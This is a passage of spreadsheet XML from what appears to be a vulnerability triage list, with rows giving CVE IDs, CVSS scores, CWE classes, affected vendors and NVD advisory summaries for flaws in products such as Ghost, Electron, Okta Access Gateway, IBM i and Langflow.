      <c r="L1475" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 0.10.0 until 6.54.1, a vulnerability in custom themes allowed a staff user to write files outside of the uploads directory. This could be used to alter the behavior of the installation through custom theme upload path traversal in LocalStorageBase and theme storage name handling. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M1475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70593</t>
        </is>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70602</t>
        </is>
      </c>
      <c r="C1476" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D1476" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1476" s="5" t="inlineStr"/>
      <c r="F1476" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1476" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H1476" s="5" t="inlineStr"/>
      <c r="I1476" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1476" s="5" t="inlineStr"/>
      <c r="K1476" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1476" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, extension tab and scripting APIs were not scoped to the extension's own session. A malicious or compromised extension loaded into one session could navigate, script, and read from windows belonging to a different session. Apps are only affected if they load Chrome extensions via session.loadExtension and rely on separate sessions to isolate that extension from other content. This issue is fixed in versions 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M1476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70602</t>
        </is>
      </c>
    </row>
    <row r="1477">
      <c r="A1477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78545</t>
        </is>
      </c>
      <c r="C1477" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D1477" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1477" s="5" t="inlineStr"/>
      <c r="F1477" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1477" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="H1477" s="5" t="inlineStr"/>
      <c r="I1477" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1477" s="5" t="inlineStr"/>
      <c r="K1477" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1477" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize the application label field before including it in the generated nginx configuration file. The unsanitized value is interpolated into an nginx server block directive, resulting in execution of injected directives.</t>
        </is>
      </c>
      <c r="M1477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t>
        </is>
      </c>
    </row>
    <row r="1478">
      <c r="A1478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78550</t>
        </is>
      </c>
      <c r="C1478" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D1478" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1478" s="5" t="inlineStr"/>
      <c r="F1478" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1478" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1478" s="5" t="inlineStr"/>
      <c r="I1478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1478" s="5" t="inlineStr"/>
      <c r="K1478" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1478" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway management console passes user-supplied input to eval() without sanitization during an authenticated administrator SSH session. As a result, the unsanitized input is executed directly, leading to code execution with the privileges of the management console.</t>
        </is>
      </c>
      <c r="M1478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t>
        </is>
      </c>
    </row>
    <row r="1479">
      <c r="A1479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1479" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-9355</t>
        </is>
      </c>
      <c r="C1479" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1479" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1479" s="5" t="inlineStr"/>
      <c r="F1479" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1479" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1479" s="5" t="inlineStr"/>
      <c r="I1479" s="5" t="inlineStr">
        <is>
          <t>2024-10-01</t>
        </is>
      </c>
      <c r="J1479" s="5" t="inlineStr"/>
      <c r="K1479" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="L1479" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.  It is also possible to force a derived key to be all zeros instead of an unpredictable value.  This may have follow-on implications for the Go TLS stack.</t>
        </is>
      </c>
      <c r="M1479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-9355</t>
        </is>
      </c>
    </row>
    <row r="1480">
      <c r="A1480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14470</t>
        </is>
      </c>
      <c r="C1480" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1480" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1480" s="5" t="inlineStr"/>
      <c r="F1480" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1480" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1480" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1480" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1480" s="5" t="inlineStr"/>
      <c r="K1480" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1480" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow an authenticated attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.</t>
        </is>
      </c>
      <c r="M1480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14470</t>
        </is>
      </c>
    </row>
    <row r="1481">
      <c r="A1481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15154</t>
        </is>
      </c>
      <c r="C1481" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1481" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1481" s="5" t="inlineStr"/>
      <c r="F1481" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1481" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H1481" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_ai</t>
        </is>
      </c>
      <c r="I1481" s="5" t="inlineStr">
        <is>
          <t>2026-07-08</t>
        </is>
      </c>
      <c r="J1481" s="5" t="inlineStr"/>
      <c r="K1481" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L1481" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in `guardrails-detectors`, a component of Red Hat OpenShift AI. This vulnerability, known as Regular Expression Denial of Service (ReDoS), allows a remote attacker to provide specially crafted regular expressions to the public detection API. This can cause catastrophic backtracking, leading to a worker process consuming 100% CPU indefinitely and resulting in a denial of service for the entire guardrails-mediated LLM pipeline.</t>
        </is>
      </c>
      <c r="M1481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15154</t>
        </is>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17259</t>
        </is>
      </c>
      <c r="C1482" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1482" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1482" s="5" t="inlineStr"/>
      <c r="F1482" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1482" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1482" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1482" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1482" s="5" t="inlineStr"/>
      <c r="K1482" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1482" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to a stack-based buffer overflow.</t>
        </is>
      </c>
      <c r="M1482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17259</t>
        </is>
      </c>
    </row>
    <row r="1483">
      <c r="A1483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17273</t>
        </is>
      </c>
      <c r="C1483" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1483" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1483" s="5" t="inlineStr"/>
      <c r="F1483" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1483" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1483" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1483" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1483" s="5" t="inlineStr"/>
      <c r="K1483" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1483" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to a NULL pointer dereference.</t>
        </is>
      </c>
      <c r="M1483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17273</t>
        </is>
      </c>
    </row>
    <row r="1484">
      <c r="A1484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17443</t>
        </is>
      </c>
      <c r="C1484" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1484" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1484" s="5" t="inlineStr"/>
      <c r="F1484" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1484" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1484" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I1484" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1484" s="5" t="inlineStr"/>
      <c r="K1484" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L1484" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity (XXE) injection flaw.</t>
        </is>
      </c>
      <c r="M1484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17443</t>
        </is>
      </c>
    </row>
    <row r="1485">
      <c r="A1485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17444</t>
        </is>
      </c>
      <c r="C1485" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1485" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1485" s="5" t="inlineStr"/>
      <c r="F1485" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1485" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1485" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I1485" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1485" s="5" t="inlineStr"/>
      <c r="K1485" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L1485" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity (XXE) injection.</t>
        </is>
      </c>
      <c r="M1485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17444</t>
        </is>
      </c>
    </row>
    <row r="1486">
      <c r="A1486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17622</t>
        </is>
      </c>
      <c r="C1486" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1486" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1486" s="5" t="inlineStr"/>
      <c r="F1486" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1486" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1486" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1486" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1486" s="5" t="inlineStr"/>
      <c r="K1486" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1486" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="M1486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17622</t>
        </is>
      </c>
    </row>
    <row r="1487">
      <c r="A1487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17631</t>
        </is>
      </c>
      <c r="C1487" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1487" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1487" s="5" t="inlineStr"/>
      <c r="F1487" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1487" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1487" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1487" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1487" s="5" t="inlineStr"/>
      <c r="K1487" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1487" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information due to a server-side request forgery (SSRF) vulnerability.</t>
        </is>
      </c>
      <c r="M1487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17631</t>
        </is>
      </c>
    </row>
    <row r="1488">
      <c r="A1488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18076</t>
        </is>
      </c>
      <c r="C1488" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1488" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1488" s="5" t="inlineStr"/>
      <c r="F1488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1488" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1488" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1488" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1488" s="5" t="inlineStr"/>
      <c r="K1488" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L1488" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to a memory leak.</t>
        </is>
      </c>
      <c r="M1488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18076</t>
        </is>
      </c>
    </row>
    <row r="1489">
      <c r="A1489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18078</t>
        </is>
      </c>
      <c r="C1489" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1489" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1489" s="5" t="inlineStr"/>
      <c r="F1489" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1489" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1489" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1489" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1489" s="5" t="inlineStr"/>
      <c r="K1489" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1489" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to an integer overflow.</t>
        </is>
      </c>
      <c r="M1489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18078</t>
        </is>
      </c>
    </row>
    <row r="1490">
      <c r="A1490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18887</t>
        </is>
      </c>
      <c r="C1490" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1490" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1490" s="5" t="inlineStr"/>
      <c r="F1490" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1490" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1490" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1490" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1490" s="5" t="inlineStr"/>
      <c r="K1490" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1490" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow an authenticated attacker to obtain sensitive information in PASE. An attacker could exploit this vulnerability to access information about process they shouldn't be permitted to access.</t>
        </is>
      </c>
      <c r="M1490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18887</t>
        </is>
      </c>
    </row>
    <row r="1491">
      <c r="A1491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19299</t>
        </is>
      </c>
      <c r="C1491" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1491" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1491" s="5" t="inlineStr"/>
      <c r="F1491" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1491" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1491" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1491" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1491" s="5" t="inlineStr"/>
      <c r="K1491" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1491" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to path traversal.</t>
        </is>
      </c>
      <c r="M1491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19299</t>
        </is>
      </c>
    </row>
    <row r="1492">
      <c r="A1492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19301</t>
        </is>
      </c>
      <c r="C1492" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1492" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1492" s="5" t="inlineStr"/>
      <c r="F1492" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1492" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1492" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1492" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1492" s="5" t="inlineStr"/>
      <c r="K1492" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1492" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to server-side request forgery.</t>
        </is>
      </c>
      <c r="M1492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19301</t>
        </is>
      </c>
    </row>
    <row r="1493">
      <c r="A1493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19302</t>
        </is>
      </c>
      <c r="C1493" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1493" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1493" s="5" t="inlineStr"/>
      <c r="F1493" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1493" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1493" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1493" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1493" s="5" t="inlineStr"/>
      <c r="K1493" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1493" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information due to improper validation of symbolic links.</t>
        </is>
      </c>
      <c r="M1493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19302</t>
        </is>
      </c>
    </row>
    <row r="1494">
      <c r="A1494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19645</t>
        </is>
      </c>
      <c r="C1494" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1494" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1494" s="5" t="inlineStr"/>
      <c r="F1494" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1494" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1494" s="5" t="inlineStr"/>
      <c r="I1494" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1494" s="5" t="inlineStr"/>
      <c r="K1494" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1494" s="5" t="inlineStr">
        <is>
          <t>IBM MQ Agent CD: v1.0.0, v1.0.1, v2.0.0, v2.0.1 An authenticated user with a valid session cookie can submit arbitrarily large or computationallyexpensive requests that cause the LLM agent workers to be held for extended periods — rangingfrom tens of seconds to over ten minutes per request. When multiple such requests are sentconcurrently, the agent worker pool becomes exhausted, causing all other IBM MQ Console users toexperience degraded performance or complete unavailability of the AI Agent feature.</t>
        </is>
      </c>
      <c r="M1494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19645</t>
        </is>
      </c>
    </row>
    <row r="1495">
      <c r="A1495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2377</t>
        </is>
      </c>
      <c r="C1495" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1495" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1495" s="5" t="inlineStr"/>
      <c r="F1495" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1495" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H1495" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I1495" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J1495" s="5" t="inlineStr"/>
      <c r="K1495" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1495" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay and mirror registry for Red Hat OpenShift. The log export feature in these products allows an authenticated user to specify an arbitrary callback URL. A backend process then makes server-side HTTP requests to this provided URL. This vulnerability, known as Server-Side Request Forgery (SSRF), could allow an attacker to send requests from the application's internal network, potentially leading to the disclosure of sensitive information.</t>
        </is>
      </c>
      <c r="M1495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2377</t>
        </is>
      </c>
    </row>
    <row r="1496">
      <c r="A1496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41607</t>
        </is>
      </c>
      <c r="C1496" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1496" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1496" s="5" t="inlineStr"/>
      <c r="F1496" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1496" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1496" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I1496" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
